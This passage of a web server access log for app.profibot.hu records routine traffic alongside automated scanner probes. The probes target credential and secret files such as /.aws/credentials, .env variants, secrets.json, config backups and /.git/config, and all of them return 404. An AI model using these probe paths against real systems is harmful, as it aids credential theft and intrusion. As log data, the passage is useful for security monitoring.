10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_app/immutable/chunks/index.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_app/env.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_app/immutable/entry/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/index.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/public/build/manifest.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/public/build/root.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/public/build/entry.client.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/app/entry.client.tsx" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/src/env.d.ts" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/astro.config.mjs" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_astro/page.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/root.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/q-manifest.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/qwik-loader.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/page-data/app-data.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/.vite/deps/_metadata.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/svelte.config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:23:36:56 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 195.178.110.155] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0" "-" +[25/Jan/2026:23:57:10 +0000] - 404 404 - GET https app.profibot.hu "/.aws/credentials" [Client 45.139.104.168] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36" "-" +[26/Jan/2026:02:43:20 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:20 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:20 +0000] - 404 404 - GET http app.profibot.hu "/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:20 +0000] - 404 404 - GET http app.profibot.hu "/xmlrpc.php?rsd" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:20 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:20 +0000] - 404 404 - GET http app.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:20 +0000] - 404 404 - GET http app.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:20 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:21 +0000] - 404 404 - GET http app.profibot.hu "/website/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:21 +0000] - 404 404 - GET http app.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:21 +0000] - 404 404 - GET http app.profibot.hu "/news/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:21 +0000] - 404 404 - GET http app.profibot.hu "/2018/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:21 +0000] - 404 404 - GET http app.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:21 +0000] - 404 404 - GET http app.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:21 +0000] - 404 404 - GET http app.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:22 +0000] - 404 404 - GET http app.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:22 +0000] - 404 404 - GET http app.profibot.hu "/media/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:22 +0000] - 404 404 - GET http app.profibot.hu "/wp2/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:22 +0000] - 404 404 - GET http app.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:22 +0000] - 404 404 - GET http app.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:02:43:22 +0000] - 404 404 - GET http app.profibot.hu "/sito/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[26/Jan/2026:07:29:06 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.1.26.27] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:29:06 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[26/Jan/2026:07:29:19 +0000] - 404 404 - GET https app.profibot.hu "/ui/login" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:29:26 +0000] - 200 200 - GET https app.profibot.hu "/ui/login.html" [Client 84.1.26.27] [Length 1282] [Gzip 2.09] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:29:39 +0000] - 200 200 - GET https app.profibot.hu "/ui/dashboard.html" [Client 84.1.26.27] [Length 1402] [Gzip 2.04] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:29:39 +0000] - 401 401 - GET https app.profibot.hu "/api/v1/fleet/vehicles" [Client 84.1.26.27] [Length 46] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/ui/dashboard.html" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/wp-config.php.sample" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/.aws/credentials" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/_profiler/phpinfo" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/.env.prod" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/secrets.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/.env.local" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/include/db.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/.env.sample" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[26/Jan/2026:07:34:12 +0000] - 404 404 - GET https app.profibot.hu "/.env.example" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:34:14 +0000] - 404 404 - GET https app.profibot.hu "/backend/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:34:14 +0000] - 404 404 - GET https app.profibot.hu "/app/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:34:14 +0000] - 404 404 - GET https app.profibot.hu "/appsettings.Development.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[26/Jan/2026:07:34:14 +0000] - 404 404 - GET https app.profibot.hu "/include/config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[26/Jan/2026:08:23:37 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.1.26.27] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:08:23:45 +0000] - 304 304 - GET https app.profibot.hu "/ui/dashboard.html" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:08:23:45 +0000] - 401 401 - GET https app.profibot.hu "/api/v1/fleet/vehicles" [Client 84.1.26.27] [Length 46] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/ui/dashboard.html" +[26/Jan/2026:10:11:18 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.1.26.27] [Length 67] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:11:25 +0000] - 304 304 - GET https app.profibot.hu "/ui/dashboard.html" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:11:25 +0000] - 401 401 - GET https app.profibot.hu "/api/v1/fleet/vehicles" [Client 84.1.26.27] [Length 46] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/ui/dashboard.html" +[26/Jan/2026:10:11:30 +0000] - 304 304 - GET https app.profibot.hu "/ui/login.html" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:12:51 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 515] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:12:51 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 84.1.26.27] [Length 11352] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/docs" +[26/Jan/2026:10:20:30 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 515] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:20:30 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 84.1.26.27] [Length 11352] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/docs" +[26/Jan/2026:10:20:49 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 515] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:20:49 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 84.1.26.27] [Length 11352] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/docs" +[26/Jan/2026:10:20:58 +0000] - 200 200 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 515] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:20:58 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 84.1.26.27] [Length 11352] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://app.profibot.hu/docs" +[26/Jan/2026:10:22:01 +0000] - - 502 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:22:03 +0000] - - 502 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:22:18 +0000] - - 502 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:22:20 +0000] - - 502 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:10:28:51 +0000] - - 502 - GET https app.profibot.hu "/docs" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:03:28:19 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 43.228.125.75] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[27/Jan/2026:03:34:52 +0000] - 404 404 - GET https app.profibot.hu "/robots.txt" [Client 74.7.228.13] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[27/Jan/2026:11:06:11 +0000] - 404 404 - GET https app.profibot.hu "/.git/config" [Client 93.123.109.175] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15" "-" +[28/Jan/2026:01:17:04 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 23.27.145.222] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[28/Jan/2026:01:45:53 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:53 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:53 +0000] - 404 404 - POST https app.profibot.hu "/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:53 +0000] - 404 404 - POST https app.profibot.hu "/api/trpc" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:53 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:53 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:53 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:53 +0000] - 405 405 - POST https app.profibot.hu "/" [Client 213.209.159.181] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:53 +0000] - 404 404 - POST https app.profibot.hu "/es" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:53 +0000] - 404 404 - POST https app.profibot.hu 